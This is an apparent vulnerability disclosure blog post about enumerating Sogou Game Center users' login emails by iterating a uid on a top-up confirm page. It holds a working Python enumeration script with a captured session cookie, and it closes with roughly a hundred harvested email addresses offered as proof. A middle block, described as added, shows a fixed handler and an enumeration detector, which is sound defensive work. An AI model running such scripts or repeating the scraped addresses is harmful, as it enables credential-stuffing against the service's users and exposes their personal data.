Sogou: login emails of 60 million users can be enumerated via uid

1. Sogou Game Center site: http://wan.sogou.com/p/index.do

2. On the top-up (recharge) page you can top up on behalf of another user.

Because the confirm page echoes the recipient's account email, iterating the uid returns other users' login emails, which can then be used for brute-force or credential-stuffing (撞库) attacks.

Probing uids shows there are 60 million+ users.

The POST request packet is as follows:

[screenshot of the POST request packet to /payconfirm.do; the image is not preserved in this copy]

Python script attached:

import http.client
import re
import urllib.parse

if __name__ == '__main__':
    for i in range(1000):
        # Only 'uid' changes per request; the other fields are the fixed
        # top-up form values captured from a legitimate request.
        params = urllib.parse.urlencode({'gid': '233', 'sid': '21', 'paygate': '-331', 'amount': '10', 'uid': i})
        headers = {
            # Session cookie of the attacker's own logged-in account
            "Cookie": "IPLOC=CN2100; SUID=63043D777D23900A000000005552F7EA; SUV=00D766AC773D04635552F7EB7AADD090; usid=63043D7730890E0A000000005563D38A; CNZZDATA1255303155=1173610824-1438220021-%7C1438220021; swfLayer=1; ppinf=5|1438220959|1439430559|Y2xpZW50aWQ6NDoxMTAwfGNydDoxMDoxNDM4MjIwOTU5fHJlZm5pY2s6MDp8dHJ1c3Q6MToxfHVzZXJpZDoxOTpkb250c2F5aGVoZUAxNjMuY29tfHVuaXFuYW1lOjk6MTEyMzQyMzExfA; pprdig=pgpiRH6X-cilVdO8pLT6V2s5gcos7yfRdrabmaNieW1v0MJawaw-M3qUMkNr_hovhIZZ0ZeQsD7yPnehRoZrb5BJA8bY5BDKs1awJwVDqhlPsLplQrsWSXB3hrUYGXTdKKhCgV-a3Pwi6qeSlGF6iJ4lD_qeDE8PifX6cA1GZDA; email=**********; SSUID=BEF747DFDC68FA329D3F93994957BE5A; ppmdig=1438220960000000dd5308bce1c345c0d36e8be0ae55856e; hostid=40731406; JSESSIONID=aaaiTZSNM3yNBghhKPC7u",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "keep-alive",
            "Pragma": "no-cache", "Cache-Control": "no-cache", "Accept": "*/*", "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            # 'Accept-Encoding: gzip, deflate' from the original request is left out:
            # http.client does not decompress, and the regex below needs plain text.
        }

        conn = http.client.HTTPConnection('wan.sogou.com', 80, timeout=2)
        conn.request(method="POST", url="/payconfirm.do", body=params, headers=headers)
        response = conn.getresponse()
        body = response.read().decode('utf-8', 'replace')
        conn.close()
        # The confirm page prints the target account's email inside the element
        # with id="dUid". The closing tag of the original lookahead was lost in
        # this copy of the post, so the match stops at the next '<' instead.
        usermail = re.findall(r'(?<= id="dUid" class="font-black">).*?(?=<)', body)
        print(usermail[0] if usermail else '(no email found for uid %d)' % i)
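The two things a practitioner wants next to this report are the server-side fix and a way to spot the loop above in logs. The block below is an added example, not code from the original post or from Sogou: a confirm-page handler written the way the post describes the flaw (the uid from the request body is looked up and its email echoed back), a hardened handler that only reveals a full address for the session's own account, and a detector that flags sessions requesting /payconfirm.do for many distinct or consecutive uids. The user table, the session/uid log format and the log lines are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed user table standing in for the real account database (assumption).
USERS = {
    233: "alice@example.com",
    234: "bob.long.name@example.net",
    235: "cz@example.org",
}


def mask_email(email):
    """Show just enough of an address for its owner to recognise it."""
    local, _, domain = email.partition("@")
    if len(local) <= 2:
        return local[0] + "***@" + domain
    return local[0] + "***" + local[-1] + "@" + domain


def confirm_page_vulnerable(session_uid, params):
    """Behaviour the post describes: the uid sent by the client is looked up
    and the full email of that account is written into the confirm page."""
    target = int(params["uid"])
    return {"dUid": USERS.get(target)}


def confirm_page_fixed(session_uid, params):
    """Hardened handler: a full address appears only for the account bound
    to the session; topping up someone else shows a masked address.
    Unknown uids get the same response shape as a masked one would not,
    so callers should combine this with rate limiting (see below)."""
    target = int(params["uid"])
    if target not in USERS:
        return None
    email = USERS[target]
    return {"dUid": email if target == session_uid else mask_email(email)}


# Constructed application-log format (assumption): timestamp, session id,
# method, path and the uid field of the POST body.
LOG_RE = re.compile(r"^(?P<ts>\S+) session=(?P<sid>\S+) POST (?P<path>\S+) uid=(?P<uid>\d+)$")


def enumeration_sessions(log_lines, distinct_threshold=20, run_length=10):
    """Return session ids that hit /payconfirm.do for at least
    distinct_threshold different uids, or for run_length consecutive uids
    (the script in the post simply counts upwards by one)."""
    uids = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("path") != "/payconfirm.do":
            continue
        uids[m.group("sid")].append(int(m.group("uid")))

    flagged = set()
    for sid, seen in uids.items():
        if len(set(seen)) >= distinct_threshold:
            flagged.add(sid)
            continue
        longest = run = 1
        for a, b in zip(seen, seen[1:]):
            run = run + 1 if b == a + 1 else 1
            longest = max(longest, run)
        if longest >= run_length:
            flagged.add(sid)
    return flagged


# Constructed sample log: one ordinary session confirming its own top-up
# twice, and one session walking uids 0..11 the way the script does.
SAMPLE_LOG = [
    "2015-07-30T10:00:01 session=normal1 POST /payconfirm.do uid=233",
    "2015-07-30T10:00:09 session=normal1 POST /payconfirm.do uid=233",
] + [
    "2015-07-30T10:01:%02d session=enum1 POST /payconfirm.do uid=%d" % (i, i)
    for i in range(12)
]

if __name__ == "__main__":
    print(confirm_page_vulnerable(233, {"uid": "234"}))
    print(confirm_page_fixed(233, {"uid": "234"}))
    print(enumeration_sessions(SAMPLE_LOG))
```

Masking alone does not close the hole: the fixed handler still tells the caller whether a uid exists, so the enumeration detector (or a per-session cap on distinct uids) is part of the fix, not an optional extra.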

Proof of vulnerability:

Don't send requests too quickly; I ran 100 as a test.
zhaozhe112@sohu.com
zhaozhe112234@sogou.com
bellwill@sogou.com
gaodingsogou@sogou.com
burst@sogou.com
bellscape@sogou.com
testxiuew@sogou.com
zhaozhe1123x@sogou.com
hotfall@sohu.com
xn-test1@sogou.com
loveystar@chinaren.com
liuxu-sogou@sogou.com
rainbow8416@sogou.com
liuxv87@sogou.com
caodanaxx1@sogou.com
wx2011916105724@sogou.com
burst009x@sogou.com
burst00786@sogou.com
gg123xo@sogou.com
txieiwowe@sogou.com
sonicfeng1981@sohu.com
burstx980@sogou.com
xn-test2@sogou.com
xianghuiru108@sohu.com
hotfall@sogou.com
caodanx@sogou.com
zhongshenxx@sogou.com
a123xy@sogou.com
axx98xl@sogou.com
axx1238-@sogou.com
xfew9874@sogou.com
stdio1@sohu.com
xn-test3@sogou.com
xn-test4@sogou.com
burst123x@sogou.com
xianghuiru5678@sogou.com
bellzhong123@sogou.com
lx187654@sogou.com
zhaozhezheng@sogou.com
xn-test5@sogou.com
sogou_open@sogou.com
a1520008935@sogou.com
xn-test6@sogou.com
xn-test7@sogou.com
a649577224@sogou.com
rty5664@sogou.com
lilin199211@sogou.com
xuexiaozhou123@sogou.com
et1130179276@sogou.com
hjhghgnb@sogou.com
wsnm1336149162@sogou.com
zjj825827@sohu.com
ww392220261@sogou.com
ljc34522748@sogou.com
w1611310734@sogou.com
sw1579483698@sogou.com
t6r65556653@sogou.com
ggf1228801615@sogou.com
w19920622@sogou.com
qiuchaojn@sogou.com
ij919440687@sogou.com
lxtext@sogou.com
a1107937270@sogou.com
dhfudshgufdg@sogou.com
qwertyuiop147236@sogou.com
qw06123456@sogou.com
yh5445456@sogou.com
jixueli@sogou.com
wss188@sogou.com
h1256508348@sogou.com
jasq@sogou.com
s994256021@sogou.com
zxc1693231929@sogou.com
u1403233627@sogou.com
qweas1073909212@sogou.com
a1491255961@sogou.com
dongdan114@sogou.com
liminhe@sogou.com
xt1230.123@sogou.com
yhhggy@sogou.com
laotian_2000_2000@chinaren.com
hgfhvghggvf@sogou.com
kuanglianpu1@sogou.com
as625673784@sogou.com
q17992140714@sogou.com
gk1094918561@sogou.com
xiaozhuge2@sogou.com
jim.@sogou.com
wangyan_works@sogou.com
q616066451@sogou.com
ffgklpglper@sogou.com
香百合1@focus.cn
a422193476@sogou.com
hgfjdsawu@sogou.com
jvb132@sogou.com
f1591268761@sogou.com
qrwerwt3465hrt@sogou.com
a1346927986482@sogou.com
gulang.com@sogou.com
zxvgbgf@sogou.com
zhi787747702@sogou.com
a1554567397@sogou.com
wm798200@focus.cn
abc-.@sogou.com
zhou1786962732@sogou.com

This post was published by 老D on 老D博客; please credit the source when reposting.
